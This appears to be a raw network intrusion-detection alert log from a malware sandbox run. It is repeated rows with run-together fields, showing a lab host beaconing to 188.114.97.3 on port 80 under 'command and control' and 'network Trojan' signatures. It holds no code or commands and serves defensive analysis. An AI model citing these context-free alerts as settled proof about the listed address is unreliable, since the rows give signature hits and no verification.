            2024-09-25T10:20:10.191855+020020243181Malware Command and Control Activity Detected192.168.2.749770188.114.97.380TCP
            2024-09-25T10:20:11.008415+020020243181Malware Command and Control Activity Detected192.168.2.749771188.114.97.380TCP
            2024-09-25T10:20:11.812480+020020243181Malware Command and Control Activity Detected192.168.2.749772188.114.97.380TCP
            2024-09-25T10:20:12.630621+020020243181Malware Command and Control Activity Detected192.168.2.749773188.114.97.380TCP
            2024-09-25T10:20:13.435959+020020243181Malware Command and Control Activity Detected192.168.2.749774188.114.97.380TCP
            2024-09-25T10:20:14.236381+020020243181Malware Command and Control Activity Detected192.168.2.749775188.114.97.380TCP
            2024-09-25T10:20:15.051935+020020243181Malware Command and Control Activity Detected192.168.2.749776188.114.97.380TCP
            2024-09-25T10:20:15.897467+020020243181Malware Command and Control Activity Detected192.168.2.749777188.114.97.380TCP
            2024-09-25T10:20:16.724336+020020243181Malware Command and Control Activity Detected192.168.2.749778188.114.97.380TCP
            2024-09-25T10:20:17.550653+020020243181Malware Command and Control Activity Detected192.168.2.749779188.114.97.380TCP
            2024-09-25T10:20:18.430421+020020243181Malware Command and Control Activity Detected192.168.2.749780188.114.97.380TCP
            2024-09-25T10:20:19.235882+020020243181Malware Command and Control Activity Detected192.168.2.749781188.114.97.380TCP
            2024-09-25T10:20:20.044297+020020243181Malware Command and Control Activity Detected192.168.2.749782188.114.97.380TCP
            2024-09-25T10:20:21.084561+020020243181Malware Command and Control Activity Detected192.168.2.749783188.114.97.380TCP
            2024-09-25T10:20:21.896883+020020243181Malware Command and Control Activity Detected192.168.2.749784188.114.97.380TCP
            2024-09-25T10:20:22.717675+020020243181Malware Command and Control Activity Detected192.168.2.749785188.114.97.380TCP
            2024-09-25T10:20:23.537060+020020243181Malware Command and Control Activity Detected192.168.2.749786188.114.97.380TCP
            2024-09-25T10:20:24.398012+020020243181Malware Command and Control Activity Detected192.168.2.749787188.114.97.380TCP
            2024-09-25T10:20:25.366305+020020243181Malware Command and Control Activity Detected192.168.2.749788188.114.97.380TCP
            2024-09-25T10:20:26.202166+020020243181Malware Command and Control Activity Detected192.168.2.749789188.114.97.380TCP
            2024-09-25T10:20:27.025481+020020243181Malware Command and Control Activity Detected192.168.2.749790188.114.97.380TCP
            2024-09-25T10:20:27.837448+020020243181Malware Command and Control Activity Detected192.168.2.749791188.114.97.380TCP
            2024-09-25T10:20:28.650735+020020243181Malware Command and Control Activity Detected192.168.2.749792188.114.97.380TCP
            2024-09-25T10:20:29.642863+020020243181Malware Command and Control Activity Detected192.168.2.749793188.114.97.380TCP
            2024-09-25T10:20:30.571474+020020243181Malware Command and Control Activity Detected192.168.2.749794188.114.97.380TCP
            2024-09-25T10:20:31.377167+020020243181Malware Command and Control Activity Detected192.168.2.749795188.114.97.380TCP
            2024-09-25T10:20:32.191160+020020243181Malware Command and Control Activity Detected192.168.2.749796188.114.97.380TCP
            2024-09-25T10:20:33.000475+020020243181Malware Command and Control Activity Detected192.168.2.749797188.114.97.380TCP
            2024-09-25T10:20:33.843258+020020243181Malware Command and Control Activity Detected192.168.2.749798188.114.97.380TCP
            2024-09-25T10:20:34.678916+020020243181Malware Command and Control Activity Detected192.168.2.749799188.114.97.380TCP
            2024-09-25T10:20:35.509847+020020243181Malware Command and Control Activity Detected192.168.2.749800188.114.97.380TCP
            2024-09-25T10:20:36.333409+020020243181Malware Command and Control Activity Detected192.168.2.749801188.114.97.380TCP
            2024-09-25T10:20:37.192021+020020243181Malware Command and Control Activity Detected192.168.2.749802188.114.97.380TCP
            2024-09-25T10:20:38.012160+020020243181Malware Command and Control Activity Detected192.168.2.749803188.114.97.380TCP
            2024-09-25T10:20:38.830735+020020243181Malware Command and Control Activity Detected192.168.2.749804188.114.97.380TCP
            2024-09-25T10:20:39.656614+020020243181Malware Command and Control Activity Detected192.168.2.749805188.114.97.380TCP
            2024-09-25T10:20:40.523719+020020243181Malware Command and Control Activity Detected192.168.2.749806188.114.97.380TCP
            2024-09-25T10:20:41.372812+020020243181Malware Command and Control Activity Detected192.168.2.749807188.114.97.380TCP
            2024-09-25T10:20:42.248861+020020243181Malware Command and Control Activity Detected192.168.2.749808188.114.97.380TCP
            2024-09-25T10:20:43.045056+020020243181Malware Command and Control Activity Detected192.168.2.749809188.114.97.380TCP
            2024-09-25T10:20:43.854654+020020243181Malware Command and Control Activity Detected192.168.2.749810188.114.97.380TCP
            2024-09-25T10:20:44.684574+020020243181Malware Command and Control Activity Detected192.168.2.749811188.114.97.380TCP
            2024-09-25T10:20:45.503133+020020243181Malware Command and Control Activity Detected192.168.2.749812188.114.97.380TCP
            2024-09-25T10:20:46.424917+020020243181Malware Command and Control Activity Detected192.168.2.749813188.114.97.380TCP
            2024-09-25T10:20:47.222041+020020243181Malware Command and Control Activity Detected192.168.2.749814188.114.97.380TCP
            2024-09-25T10:20:48.049566+020020243181Malware Command and Control Activity Detected192.168.2.749815188.114.97.380TCP
            2024-09-25T10:20:49.020610+020020243181Malware Command and Control Activity Detected192.168.2.749816188.114.97.380TCP
            2024-09-25T10:20:50.103271+020020243181Malware Command and Control Activity Detected192.168.2.749817188.114.97.380TCP
            2024-09-25T10:20:50.944188+020020243181Malware Command and Control Activity Detected192.168.2.749818188.114.97.380TCP
            2024-09-25T10:20:51.808740+020020243181Malware Command and Control Activity Detected192.168.2.749819188.114.97.380TCP
            2024-09-25T10:20:52.620616+020020243181Malware Command and Control Activity Detected192.168.2.749820188.114.97.380TCP
            2024-09-25T10:20:53.479823+020020243181Malware Command and Control Activity Detected192.168.2.749821188.114.97.380TCP
            2024-09-25T10:20:54.312873+020020243181Malware Command and Control Activity Detected192.168.2.749822188.114.97.380TCP
            2024-09-25T10:20:55.121000+020020243181Malware Command and Control Activity Detected192.168.2.749823188.114.97.380TCP
            2024-09-25T10:20:55.938989+020020243181Malware Command and Control Activity Detected192.168.2.749824188.114.97.380TCP
            2024-09-25T10:20:56.779578+020020243181Malware Command and Control Activity Detected192.168.2.749825188.114.97.380TCP
            2024-09-25T10:20:57.616206+020020243181Malware Command and Control Activity Detected192.168.2.749826188.114.97.380TCP
            2024-09-25T10:20:58.434386+020020243181Malware Command and Control Activity Detected192.168.2.749827188.114.97.380TCP
            2024-09-25T10:20:59.260870+020020243181Malware Command and Control Activity Detected192.168.2.749828188.114.97.380TCP
            2024-09-25T10:21:00.485716+020020243181Malware Command and Control Activity Detected192.168.2.749829188.114.97.380TCP
            2024-09-25T10:21:01.352133+020020243181Malware Command and Control Activity Detected192.168.2.749830188.114.97.380TCP
            2024-09-25T10:21:02.141157+020020243181Malware Command and Control Activity Detected192.168.2.749831188.114.97.380TCP
            2024-09-25T10:21:03.199950+020020243181Malware Command and Control Activity Detected192.168.2.749832188.114.97.380TCP
            2024-09-25T10:21:04.015053+020020243181Malware Command and Control Activity Detected192.168.2.749833188.114.97.380TCP
            2024-09-25T10:21:05.131735+020020243181Malware Command and Control Activity Detected192.168.2.749834188.114.97.380TCP
            2024-09-25T10:21:05.949911+020020243181Malware Command and Control Activity Detected192.168.2.749835188.114.97.380TCP
            2024-09-25T10:21:06.745448+020020243181Malware Command and Control Activity Detected192.168.2.749836188.114.97.380TCP
            2024-09-25T10:21:07.563958+020020243181Malware Command and Control Activity Detected192.168.2.749837188.114.97.380TCP
            2024-09-25T10:21:08.545523+020020243181Malware Command and Control Activity Detected192.168.2.749838188.114.97.380TCP
            2024-09-25T10:21:10.666965+020020243181Malware Command and Control Activity Detected192.168.2.749839188.114.97.380TCP
            2024-09-25T10:21:11.513058+020020243181Malware Command and Control Activity Detected192.168.2.749840188.114.97.380TCP
            2024-09-25T10:21:12.356325+020020243181Malware Command and Control Activity Detected192.168.2.749841188.114.97.380TCP
            2024-09-25T10:21:13.248308+020020243181Malware Command and Control Activity Detected192.168.2.749842188.114.97.380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T10:19:08.211638+020020216411A Network Trojan was detected192.168.2.749699188.114.97.380TCP
            2024-09-25T10:19:09.263458+020020216411A Network Trojan was detected192.168.2.749700188.114.97.380TCP
            2024-09-25T10:19:10.062927+020020216411A Network Trojan was detected192.168.2.749701188.114.97.380TCP
            2024-09-25T10:19:10.969314+020020216411A Network Trojan was detected192.168.2.749702188.114.97.380TCP
            2024-09-25T10:19:11.837774+020020216411A Network Trojan was detected192.168.2.749703188.114.97.380TCP
            2024-09-25T10:19:12.688864+020020216411A Network Trojan was detected192.168.2.749704188.114.97.380TCP
            2024-09-25T10:19:13.615421+020020216411A Network Trojan was detected192.168.2.749705188.114.97.380TCP
            2024-09-25T10:19:14.711569+020020216411A Network Trojan was detected192.168.2.749706188.114.97.380TCP
            2024-09-25T10:19:15.581402+020020216411A Network Trojan was detected192.168.2.749707188.114.97.380TCP
            2024-09-25T10:19:16.376989+020020216411A Network Trojan was detected192.168.2.749708188.114.97.380TCP
            2024-09-25T10:19:17.178646+020020216411A Network Trojan was detected192.168.2.749709188.114.97.380TCP
            2024-09-25T10:19:18.296157+020020216411A Network Trojan was detected192.168.2.749710188.114.97.380TCP
            2024-09-25T10:19:19.154274+020020216411A Network Trojan was detected192.168.2.749711188.114.97.380TCP
            2024-09-25T10:19:20.137435+020020216411A Network Trojan was detected192.168.2.749712188.114.97.380TCP
            2024-09-25T10:19:21.053477+020020216411A Network Trojan was detected192.168.2.749713188.114.97.380TCP
            2024-09-25T10:19:21.842648+020020216411A Network Trojan was detected192.168.2.749714188.114.97.380TCP
            2024-09-25T10:19:22.855192+020020216411A Network Trojan was detected192.168.2.749715188.114.97.380TCP
            2024-09-25T10:19:23.676953+020020216411A Network Trojan was detected192.168.2.749718188.114.97.380TCP
            2024-09-25T10:19:24.570672+020020216411A Network Trojan was detected192.168.2.749720188.114.97.380TCP
            2024-09-25T10:19:25.439700+020020216411A Network Trojan was detected192.168.2.749723188.114.97.380TCP
            2024-09-25T10:19:27.269752+020020216411A Network Trojan was detected192.168.2.749724188.114.97.380TCP
            2024-09-25T10:19:28.206792+020020216411A Network Trojan was detected192.168.2.749725188.114.97.380TCP
            2024-09-25T10:19:29.037709+020020216411A Network Trojan was detected192.168.2.749726188.114.97.380TCP
            2024-09-25T10:19:29.847888+020020216411A Network Trojan was detected192.168.2.749727188.114.97.380TCP
            2024-09-25T10:19:30.733826+020020216411A Network Trojan was detected192.168.2.749728188.114.97.380TCP
            2024-09-25T10:19:32.177777+020020216411A Network Trojan was detected192.168.2.749729188.114.97.380TCP
            2024-09-25T10:19:32.989857+020020216411A Network Trojan was detected192.168.2.749730188.114.97.380TCP
            2024-09-25T10:19:33.800027+020020216411A Network Trojan was detected192.168.2.749731188.114.97.380TCP
            2024-09-25T10:19:34.631187+020020216411A Network Trojan was detected192.168.2.749732188.114.97.380TCP
            2024-09-25T10:19:35.482687+020020216411A Network Trojan was detected192.168.2.749733188.114.97.380TCP
            2024-09-25T10:19:36.537688+020020216411A Network Trojan was detected192.168.2.749734188.114.97.380TCP
            2024-09-25T10:19:37.356070+020020216411A Network Trojan was detected192.168.2.749735188.114.97.380TCP
            2024-09-25T10:19:39.239881+020020216411A Network Trojan was detected192.168.2.749736188.114.97.380TCP
            2024-09-25T10:19:40.078687+020020216411A Network Trojan was detected192.168.2.749737188.114.97.380TCP
            2024-09-25T10:19:40.911451+020020216411A Network Trojan was detected192.168.2.749738188.114.97.380TCP
            2024-09-25T10:19:41.735560+020020216411A Network Trojan was detected192.168.2.749739188.114.97.380TCP
            2024-09-25T10:19:42.570720+020020216411A Network Trojan was detected192.168.2.749740188.114.97.380TCP
            2024-09-25T10:19:43.399885+020020216411A Network Trojan was detected192.168.2.749741188.114.97.380TCP
            2024-09-25T10:19:44.190956+020020216411A Network Trojan was detected192.168.2.749742188.114.97.380TCP
            2024-09-25T10:19:45.016789+020020216411A Network Trojan was detected192.168.2.749743188.114.97.380TCP
            2024-09-25T10:19:45.828745+020020216411A Network Trojan was detected192.168.2.749744188.114.97.380TCP
            2024-09-25T10:19:46.711712+020020216411A Network Trojan was detected192.168.2.749745188.114.97.380TCP
            2024-09-25T10:19:47.595407+020020216411A Network Trojan was detected192.168.2.749746188.114.97.380TCP
            2024-09-25T10:19:48.437321+020020216411A Network Trojan was detected192.168.2.749747188.114.97.380TCP
            2024-09-25T10:19:49.234722+020020216411A Network Trojan was detected192.168.2.749748188.114.97.380TCP
            2024-09-25T10:19:50.049266+020020216411A Network Trojan was detected192.168.2.749749188.114.97.380TCP
            2024-09-25T10:19:50.858143+020020216411A Network Trojan was detected192.168.2.749750188.114.97.380TCP
            2024-09-25T10:19:51.659793+020020216411A Network Trojan was detected192.168.2.749751188.114.97.380TCP
            2024-09-25T10:19:52.634585+020020216411A Network Trojan was detected192.168.2.749752188.114.97.380TCP
            2024-09-25T10:19:53.523329+020020216411A Network Trojan was detected192.168.2.749753188.114.97.380TCP
            2024-09-25T10:19:54.536452+020020216411A Network Trojan was detected192.168.2.749754188.114.97.380TCP
            2024-09-25T10:19:55.485678+020020216411A Network Trojan was detected192.168.2.749755188.114.97.380TCP
            2024-09-25T10:19:56.301649+020020216411A Network Trojan was detected192.168.2.749756188.114.97.380TCP
            2024-09-25T10:19:57.172763+020020216411A Network Trojan was detected192.168.2.749757188.114.97.380TCP
            2024-09-25T10:19:59.000979+020020216411A Network Trojan was detected192.168.2.749758188.114.97.380TCP
            2024-09-25T10:19:59.891904+020020216411A Network Trojan was detected192.168.2.749759188.114.97.380TCP
            2024-09-25T10:20:00.718978+020020216411A Network Trojan was detected192.168.2.749760188.114.97.380TCP
            2024-09-25T10:20:01.526168+020020216411A Network Trojan was detected192.168.2.749761188.114.97.380TCP
            2024-09-25T10:20:02.392071+020020216411A Network Trojan was detected192.168.2.749763188.114.97.380TCP
            2024-09-25T10:20:03.257255+020020216411A Network Trojan was detected192.168.2.749764188.114.97.380TCP
            2024-09-25T10:20:04.071220+020020216411A Network Trojan was detected192.168.2.749765188.114.97.380TCP
            2024-09-25T10:20:05.030104+020020216411A Network Trojan was detected192.168.2.749766188.114.97.380TCP
            2024-09-25T10:20:05.858737+020020216411A Network Trojan was detected192.168.2.749767188.114.97.380TCP
            2024-09-25T10:20:06.718238+020020216411A Network Trojan was detected192.168.2.749768188.114.97.380TCP
            2024-09-25T10:20:07.582940+020020216411A Network Trojan was detected192.168.2.749769188.114.97.380TCP
            2024-09-25T10:20:09.443638+020020216411A Network Trojan was detected192.168.2.749770188.114.97.380TCP
            2024-09-25T10:20:10.343573+020020216411A Network Trojan was detected192.168.2.749771188.114.97.380TCP
            2024-09-25T10:20:11.162336+020020216411A Network Trojan was detected192.168.2.749772188.114.97.380TCP
            2024-09-25T10:20:11.972432+020020216411A Network Trojan was detected192.168.2.749773188.114.97.380TCP
            2024-09-25T10:20:12.784342+020020216411A Network Trojan was detected192.168.2.749774188.114.97.380TCP
            2024-09-25T10:20:13.600309+020020216411A Network Trojan was detected192.168.2.749775188.114.97.380TCP
            2024-09-25T10:20:14.393221+020020216411A Network Trojan was detected192.168.2.749776188.114.97.380TCP
            2024-09-25T10:20:15.204070+020020216411A Network Trojan was detected192.168.2.749777188.114.97.380TCP
            2024-09-25T10:20:16.046849+020020216411A Network Trojan was detected192.168.2.749778188.114.97.380TCP
            2024-09-25T10:20:16.874999+020020216411A Network Trojan was detected192.168.2.749779188.114.97.380TCP
            2024-09-25T10:20:17.701124+020020216411A Network Trojan was detected192.168.2.749780188.114.97.380TCP
            2024-09-25T10:20:18.577128+020020216411A Network Trojan was detected192.168.2.749781188.114.97.380TCP
            2024-09-25T10:20:19.388646+020020216411A Network Trojan was detected192.168.2.749782188.114.97.380TCP
            2024-09-25T10:20:20.429528+020020216411A Network Trojan was detected192.168.2.749783188.114.97.380TCP
            2024-09-25T10:20:21.233233+020020216411A Network Trojan was detected192.168.2.749784188.114.97.380TCP
            2024-09-25T10:20:22.045367+020020216411A Network Trojan was detected192.168.2.749785188.114.97.380TCP
            2024-09-25T10:20:22.876653+020020216411A Network Trojan was detected192.168.2.749786188.114.97.380TCP
            2024-09-25T10:20:23.686182+020020216411A Network Trojan was detected192.168.2.749787188.114.97.380TCP
            2024-09-25T10:20:24.545070+020020216411A Network Trojan was detected192.168.2.749788188.114.97.380TCP
            2024-09-25T10:20:25.516198+020020216411A Network Trojan was detected192.168.2.749789188.114.97.380TCP
            2024-09-25T10:20:26.367186+020020216411A Network Trojan was detected192.168.2.749790188.114.97.380TCP
            2024-09-25T10:20:27.187595+020020216411A Network Trojan was detected192.168.2.749791188.114.97.380TCP
            2024-09-25T10:20:28.005117+020020216411A Network Trojan was detected192.168.2.749792188.114.97.380TCP
            2024-09-25T10:20:28.823348+020020216411A Network Trojan was detected192.168.2.749793188.114.97.380TCP
            2024-09-25T10:20:29.793057+020020216411A Network Trojan was detected192.168.2.749794188.114.97.380TCP
            2024-09-25T10:20:30.724248+020020216411A Network Trojan was detected192.168.2.749795188.114.97.380TCP
            2024-09-25T10:20:31.529840+020020216411A Network Trojan was detected192.168.2.749796188.114.97.380TCP
            2024-09-25T10:20:32.349270+020020216411A Network Trojan was detected192.168.2.749797188.114.97.380TCP
            2024-09-25T10:20:33.159073+020020216411A Network Trojan was detected192.168.2.749798188.114.97.380TCP
            2024-09-25T10:20:34.004751+020020216411A Network Trojan was detected192.168.2.749799188.114.97.380TCP
            2024-09-25T10:20:34.831696+020020216411A Network Trojan was detected192.168.2.749800188.114.97.380TCP
            2024-09-25T10:20:35.676731+020020216411A Network Trojan was detected192.168.2.749801188.114.97.380TCP
            2024-09-25T10:20:36.488105+020020216411A Network Trojan was detected192.168.2.749802188.114.97.380TCP
            2024-09-25T10:20:37.347438+020020216411A Network Trojan was detected192.168.2.749803188.114.97.380TCP
            2024-09-25T10:20:38.170705+020020216411A Network Trojan was detected192.168.2.749804188.114.97.380TCP
            2024-09-25T10:20:38.983344+020020216411A Network Trojan was detected192.168.2.749805188.114.97.380TCP
            2024-09-25T10:20:39.812510+020020216411A Network Trojan was detected192.168.2.749806188.114.97.380TCP
            2024-09-25T10:20:40.679656+020020216411A Network Trojan was detected192.168.2.749807188.114.97.380TCP
            2024-09-25T10:20:41.532089+020020216411A Network Trojan was detected192.168.2.749808188.114.97.380TCP
            2024-09-25T10:20:42.407099+020020216411A Network Trojan was detected192.168.2.749809188.114.97.380TCP
            2024-09-25T10:20:43.201046+020020216411A Network Trojan was detected192.168.2.749810188.114.97.380TCP
            2024-09-25T10:20:44.020697+020020216411A Network Trojan was detected192.168.2.749811188.114.97.380TCP
            2024-09-25T10:20:44.843940+020020216411A Network Trojan was detected192.168.2.749812188.114.97.380TCP
            2024-09-25T10:20:45.767835+020020216411A Network Trojan was detected192.168.2.749813188.114.97.380TCP
            2024-09-25T10:20:46.581998+020020216411A Network Trojan was detected192.168.2.749814188.114.97.380TCP
            2024-09-25T10:20:47.383984+020020216411A Network Trojan was detected192.168.2.749815188.114.97.380TCP
            2024-09-25T10:20:48.345316+020020216411A Network Trojan was detected192.168.2.749816188.114.97.380TCP
            2024-09-25T10:20:49.177011+020020216411A Network Trojan was detected192.168.2.749817188.114.97.380TCP
            2024-09-25T10:20:50.264754+020020216411A Network Trojan was detected192.168.2.749818188.114.97.380TCP
            2024-09-25T10:20:51.117098+020020216411A Network Trojan was detected192.168.2.749819188.114.97.380TCP
            2024-09-25T10:20:51.965926+020020216411A Network Trojan was detected192.168.2.749820188.114.97.380TCP
            2024-09-25T10:20:52.847890+020020216411A Network Trojan was detected192.168.2.749821188.114.97.380TCP
            2024-09-25T10:20:53.648400+020020216411A Network Trojan was detected192.168.2.749822188.114.97.380TCP
            2024-09-25T10:20:54.469239+020020216411A Network Trojan was detected192.168.2.749823188.114.97.380TCP
            2024-09-25T10:20:55.277763+020020216411A Network Trojan was detected192.168.2.749824188.114.97.380TCP
            2024-09-25T10:20:56.095548+020020216411A Network Trojan was detected192.168.2.749825188.114.97.380TCP
            2024-09-25T10:20:56.943672+020020216411A Network Trojan was detected192.168.2.749826188.114.97.380TCP
            2024-09-25T10:20:57.765117+020020216411A Network Trojan was detected192.168.2.749827188.114.97.380TCP
            2024-09-25T10:20:58.604735+020020216411A Network Trojan was detected192.168.2.749828188.114.97.380TCP
            2024-09-25T10:21:00.485716+020020216411A Network Trojan was detected192.168.2.749829188.114.97.380TCP
            2024-09-25T10:21:00.652378+020020216411A Network Trojan was detected192.168.2.749830188.114.97.380TCP
            2024-09-25T10:21:01.509563+020020216411A Network Trojan was detected192.168.2.749831188.114.97.380TCP
            2024-09-25T10:21:02.530015+020020216411A Network Trojan was detected192.168.2.749832188.114.97.380TCP
            2024-09-25T10:21:03.370905+020020216411A Network Trojan was detected192.168.2.749833188.114.97.380TCP
            2024-09-25T10:21:04.493818+020020216411A Network Trojan was detected192.168.2.749834188.114.97.380TCP
            2024-09-25T10:21:05.272946+020020216411A Network Trojan was detected192.168.2.749835188.114.97.380TCP
            2024-09-25T10:21:06.101214+020020216411A Network Trojan was detected192.168.2.749836188.114.97.380TCP
            2024-09-25T10:21:06.901425+020020216411A Network Trojan was detected192.168.2.749837188.114.97.380TCP
            2024-09-25T10:21:07.859251+020020216411A Network Trojan was detected192.168.2.749838188.114.97.380TCP
            2024-09-25T10:21:09.943417+020020216411A Network Trojan was detected192.168.2.749839188.114.97.380TCP
            2024-09-25T10:21:10.818081+020020216411A Network Trojan was detected192.168.2.749840188.114.97.380TCP
            2024-09-25T10:21:11.674440+020020216411A Network Trojan was detected192.168.2.749841188.114.97.380TCP
            2024-09-25T10:21:12.571148+020020216411A Network Trojan was detected192.168.2.749842188.114.97.380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T10:19:08.211638+020028257661Malware Command and Control Activity Detected192.168.2.749699188.114.97.380TCP
            2024-09-25T10:19:09.263458+020028257661Malware Command and Control Activity Detected192.168.2.749700188.114.97.380TCP
            2024-09-25T10:19:10.062927+020028257661Malware Command and Control Activity Detected192.168.2.749701188.114.97.380TCP
            2024-09-25T10:19:10.969314+020028257661Malware Command and Control Activity Detected192.168.2.749702188.114.97.380TCP
            2024-09-25T10:19:11.837774+020028257661Malware Command and Control Activity Detected192.168.2.749703188.114.97.380TCP
            2024-09-25T10:19:12.688864+020028257661Malware Command and Control Activity Detected192.168.2.749704188.114.97.380TCP
            2024-09-25T10:19:13.615421+020028257661Malware Command and Control Activity Detected192.168.2.749705188.114.97.380TCP
            2024-09-25T10:19:14.711569+020028257661Malware Command and Control Activity Detected192.168.2.749706188.114.97.380TCP
            2024-09-25T10:19:15.581402+020028257661Malware Command and Control Activity Detected192.168.2.749707188.114.97.380TCP
            2024-09-25T10:19:16.376989+020028257661Malware Command and Control Activity Detected192.168.2.749708188.114.97.380TCP
            2024-09-25T10:19:17.178646+020028257661Malware Command and Control Activity Detected192.168.2.749709188.114.97.380TCP
            2024-09-25T10:19:18.296157+020028257661Malware Command and Control Activity Detected192.168.2.749710188.114.97.380TCP
            2024-09-25T10:19:19.154274+020028257661Malware Command and Control Activity Detected192.168.2.749711188.114.97.380TCP
            2024-09-25T10:19:20.137435+020028257661Malware Command and Control Activity Detected192.168.2.749712188.114.97.380TCP
            2024-09-25T10:19:21.053477+020028257661Malware Command and Control Activity Detected192.168.2.749713188.114.97.380TCP
            2024-09-25T10:19:21.842648+020028257661Malware Command and Control Activity Detected192.168.2.749714188.114.97.380TCP
            2024-09-25T10:19:22.855192+020028257661Malware Command and Control Activity Detected192.168.2.749715188.114.97.380TCP
            2024-09-25T10:19:23.676953+020028257661Malware Command and Control Activity Detected192.168.2.749718188.114.97.380TCP
            2024-09-25T10:19:24.570672+020028257661Malware Command and Control Activity Detected192.168.2.749720188.114.97.380TCP
            2024-09-25T10:19:25.439700+020028257661Malware Command and Control Activity Detected192.168.2.749723188.114.97.380TCP
            2024-09-25T10:19:27.269752+020028257661Malware Command and Control Activity Detected192.168.2.749724188.114.97.380TCP
            2024-09-25T10:19:28.206792+020028257661Malware Command and Control Activity Detected192.168.2.749725188.114.97.380TCP
            2024-09-25T10:19:29.037709+020028257661Malware Command and Control Activity Detected192.168.2.749726188.114.97.380TCP
            2024-09-25T10:19:29.847888+020028257661Malware Command and Control Activity Detected192.168.2.749727188.114.97.380TCP
            2024-09-25T10:19:30.733826+020028257661Malware Command and Control Activity Detected192.168.2.749728188.114.97.380TCP
            2024-09-25T10:19:32.177777+020028257661Malware Command and Control Activity Detected192.168.2.749729188.114.97.380TCP
            2024-09-25T10:19:32.989857+020028257661Malware Command and Control Activity Detected192.168.2.749730188.114.97.380TCP
            2024-09-25T10:19:33.800027+020028257661Malware Command and Control Activity Detected192.168.2.749731188.114.97.380TCP
            2024-09-25T10:19:34.631187+020028257661Malware Command and Control Activity Detected192.168.2.749732188.114.97.380TCP
            2024-09-25T10:19:35.482687+020028257661Malware Command and Control Activity Detected192.168.2.749733188.114.97.380TCP
            2024-09-25T10:19:36.537688+020028257661Malware Command and Control Activity Detected192.168.2.749734188.114.97.380TCP
            2024-09-25T10:19:37.356070+020028257661Malware Command and Control Activity Detected192.168.2.749735188.114.97.380TCP
            2024-09-25T10:19:39.239881+020028257661Malware Command and Control Activity Detected192.168.2.749736188.114.97.380TCP
            2024-09-25T10:19:40.078687+020028257661Malware Command and Control Activity Detected192.168.2.749737188.114.97.380TCP
            2024-09-25T10:19:40.911451+020028257661Malware Command and Control Activity Detected192.168.2.749738188.114.97.380TCP
            2024-09-25T10:19:41.735560+020028257661Malware Command and Control Activity Detected192.168.2.749739188.114.97.380TCP
            2024-09-25T10:19:42.570720+020028257661Malware Command and Control Activity Detected192.168.2.749740188.114.97.380TCP
            2024-09-25T10:19:43.399885+020028257661Malware Command and Control Activity Detected192.168.2.749741188.114.97.380TCP
            2024-09-25T10:19:44.190956+020028257661Malware Command and Control Activity Detected192.168.2.749742188.114.97.380TCP
            2024-09-25T10:19:45.016789+020028257661Malware Command and Control Activity Detected192.168.2.749743188.114.97.380TCP
            2024-09-25T10:19:45.828745+020028257661Malware Command and Control Activity Detected192.168.2.749744188.114.97.380TCP
            2024-09-25T10:19:46.711712+020028257661Malware Command and Control Activity Detected192.168.2.749745188.114.97.380TCP
            2024-09-25T10:19:47.595407+020028257661Malware Command and Control Activity Detected192.168.2.749746188.114.97.380TCP
            2024-09-25T10:19:48.437321+020028257661Malware Command and Control Activity Detected192.168.2.749747188.114.97.380TCP
            2024-09-25T10:19:49.234722+020028257661Malware Command and Control Activity Detected192.168.2.749748188.114.97.380TCP
            2024-09-25T10:19:50.049266+020028257661Malware Command and Control Activity Detected192.168.2.749749188.114.97.380TCP
            2024-09-25T10:19:50.858143+020028257661Malware Command and Control Activity Detected192.168.2.749750188.114.97.380TCP
            2024-09-25T10:19:51.659793+020028257661Malware Command and Control Activity Detected192.168.2.749751188.114.97.380TCP
            2024-09-25T10:19:52.634585+020028257661Malware Command and Control Activity Detected192.168.2.749752188.114.97.380TCP
            2024-09-25T10:19:53.523329+020028257661Malware Command and Control Activity Detected192.168.2.749753188.114.97.380TCP
            2024-09-25T10:19:54.536452+020028257661Malware Command and Control Activity Detected192.168.2.749754188.114.97.380TCP
            2024-09-25T10:19:55.485678+020028257661Malware Command and Control Activity Detected192.168.2.749755188.114.97.380TCP
            2024-09-25T10:19:56.301649+020028257661Malware Command and Control Activity Detected192.168.2.749756188.114.97.380TCP
            2024-09-25T10:19:57.172763+020028257661Malware Command and Control Activity Detected192.168.2.749757188.114.97.380TCP
            2024-09-25T10:19:59.000979+020028257661Malware Command and Control Activity Detected192.168.2.749758188.114.97.380TCP
            2024-09-25T10:19:59.891904+020028257661Malware Command and Control Activity Detected192.168.2.749759188.114.97.380TCP
            2024-09-25T10:20:00.718978+020028257661Malware Command and Control Activity Detected192.168.2.749760188.114.97.380TCP
            2024-09-25T10:20:01.526168+020028257661Malware Command and Control Activity Detected192.168.2.749761188.114.97.380TCP
            2024-09-25T10:20:02.392071+020028257661Malware Command and Control Activity Detected192.168.2.749763188.114.97.380TCP
            2024-09-25T10:20:03.257255+020028257661Malware Command and Control Activity Detected192.168.2.749764188.114.97.380TCP
            2024-09-25T10:20:04.071220+020028257661Malware Command and Control Activity Detected192.168.2.749765188.114.97.380TCP
            2024-09-25T10:20:05.030104+020028257661Malware Command and Control Activity Detected192.168.2.749766188.114.97.380TCP
            2024-09-25T10:20:05.858737+020028257661Malware Command and Control Activity Detected192.168.2.749767188.114.97.380TCP
            2024-09-25T10:20:06.718238+020028257661Malware Command and Control Activity Detected192.168.2.749768188.114.97.380TCP
            2024-09-25T10:20:07.582940+020028257661Malware Command and Control Activity Detected192.168.2.749769188.114.97.380TCP
            2024-09-25T10:20:09.443638+020028257661Malware Command and Control Activity Detected192.168.2.749770188.114.97.380TCP
            2024-09-25T10:20:10.343573+020028257661Malware Command and Control Activity Detected192.168.2.749771188.114.97.380TCP
            2024-09-25T10:20:11.162336+020028257661Malware Command and Control Activity Detected192.168.2.749772188.114.97.380TCP
            2024-09-25T10:20:11.972432+020028257661Malware Command and Control Activity Detected192.168.2.749773188.114.97.380TCP
            2024-09-25T10:20:12.784342+020028257661Malware Command and Control Activity Detected192.168.2.749774188.114.97.380TCP
            2024-09-25T10:20:13.600309+020028257661Malware Command and Control Activity Detected192.168.2.749775188.114.97.380TCP
            2024-09-25T10:20:14.393221+020028257661Malware Command and Control Activity Detected192.168.2.749776188.114.97.380TCP
            2024-09-25T10:20:15.204070+020028257661Malware Command and Control Activity Detected192.168.2.749777188.114.97.380TCP
            2024-09-25T10:20:16.046849+020028257661Malware Command and Control Activity Detected192.168.2.749778188.114.97.380TCP
            2024-09-25T10:20:16.874999+020028257661Malware Command and Control Activity Detected192.168.2.749779188.114.97.380TCP
